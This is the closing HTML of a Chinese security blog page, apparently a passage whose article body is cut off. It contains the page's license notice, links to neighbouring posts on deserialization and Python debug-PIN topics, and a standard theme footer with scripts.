      <a href="https://fupanc.github.io/2024/05/09/pickle%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" title="pickle反序列化">https://fupanc.github.io/2024/05/09/pickle反序列化/</a>
  </li>
  <li class="post-copyright-license">
      <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2024/04/28/session%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%AD%A6%E4%B9%A0/" rel="prev" title="session反序列化学习">
                  <i class="fa fa-angle-left"></i> session反序列化学习
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2024/05/16/Python%20Debug%20PIN%E7%A0%81%E7%9A%84%E5%88%A9%E7%94%A8/" rel="next" title="Python Debug PIN码的利用及做题笔记">
                  Python Debug PIN码的利用及做题笔记 <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy; 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">Fupanc</span>
  </div>
<div class="busuanzi-count">
    <span class="post-meta-item" id="busuanzi_container_site_uv">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-item" id="busuanzi_container_site_pv">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>
  <div class="powered-by">
    <!--由 <a href="https://hexo.io/" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动 -->
  </div>

    </div>
  </footer>

  
  <script type="text/javascript"
  color="0,0,0" opacity='0.4' zIndex="-2" count="20" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
    

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="返回顶部">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>
  <a role="button" class="book-mark-link book-mark-link-fixed"></a>

  <a href="https://github.com/yourname" class="github-corner" title="在 GitHub 上关注我" aria-label="在 GitHub 上关注我" rel="noopener" target="_blank"><svg width="80" height="80" viewBox="0 0 250 250" aria-hidden="true"><path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path><path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2" fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path><path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z" fill="currentColor" class="octo-body"></path></svg></a>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/next-boot.js"></script><script src="/js/bookmark.js"></script>

  <script src="https://cdnjs.cloudflare.com/ajax/libs/hexo-generator-searchdb/1.4.1/search.js" integrity="sha256-1kfA5uHPf65M5cphT2dvymhkuyHPQp5A53EGZOnOLmc=" crossorigin="anonymous"></script>
<script src="/js/third-party/search/local-search.js"></script>





  <script src="/js/third-party/pace.js"></script>


  
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>





</body>
</html>
